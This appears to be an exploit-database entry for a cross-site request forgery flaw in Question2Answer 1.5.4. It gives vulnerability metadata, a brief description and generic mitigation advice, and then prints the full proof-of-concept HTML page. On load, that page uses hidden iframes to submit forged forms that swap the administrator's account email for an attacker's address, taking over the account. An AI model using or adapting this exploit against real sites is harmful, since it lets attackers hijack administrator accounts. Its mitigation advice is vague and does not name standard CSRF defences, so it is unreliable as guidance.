Cross-Site Request Forgery Vulnerability in Question2Answer

vendor:

Question2Answer

by:

MustLive

7,5

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: Question2Answer

Affected Version From: Question2Answer 1.5.4

Affected Version To: Question2Answer 1.5.4

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

Cross-Site Request Forgery Vulnerability in Question2Answer

Question2Answer is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. An attacker can create a malicious HTML page with a form that submits to the vulnerable application. The form can contain hidden fields that contain malicious data. When a user visits the malicious page, the form is automatically submitted and the malicious data is processed by the vulnerable application.

Mitigation:

To mitigate this issue, the application should implement a strict policy that limits the actions that can be performed by a user. Additionally, the application should validate all input and reject any malicious input.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/58414/info

Question2Answer is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.

Question2Answer 1.5.4 is vulnerable; other versions may also be affected.

<html>
<head>
<title>Exploit for stealing admin's account in Question2Answer. Made by
MustLive. http://www.example.com</title>
</head>
<body onLoad="StartCSRF()">
<script>
function StartCSRF() {
for (var i=1;i<=2;i++) {
 var ifr = document.createElement("iframe");
 ifr.setAttribute('name', 'csrf'+i);
 ifr.setAttribute('width', '0');
 ifr.setAttribute('height', '0');
 document.body.appendChild(ifr);
}
CSRF1();
setTimeout(CSRF2,1000);
}
function CSRF1() {
window.frames["csrf1"].document.body.innerHTML = '<form name="hack"
action="http://www.example.com/account"; method="post">n<input type="hidden"
name="handle" value="test">n<input type="hidden" name="email"
value="email () attacker com">n<input type="hidden" name="messages"
value="1">n<input type="hidden" name="mailings" value="1">n<input
type="hidden" name="field_1" value="test">n<input type="hidden"
name="field_2" value="test">n<input type="hidden" name="field_3"
value="test">n<input type="hidden" name="dosaveprofile"
value="1">n</form>';
window.frames["csrf1"].document.hack.submit();
}
function CSRF2() {
window.frames["csrf2"].document.body.innerHTML = '<form name="hack"
action="http://www.example.com/attack.php"; method="post">n<input type="hidden"
name="do" value="1">n</form>';
window.frames["csrf2"].document.hack.submit();
}
</script>
</body>
</html>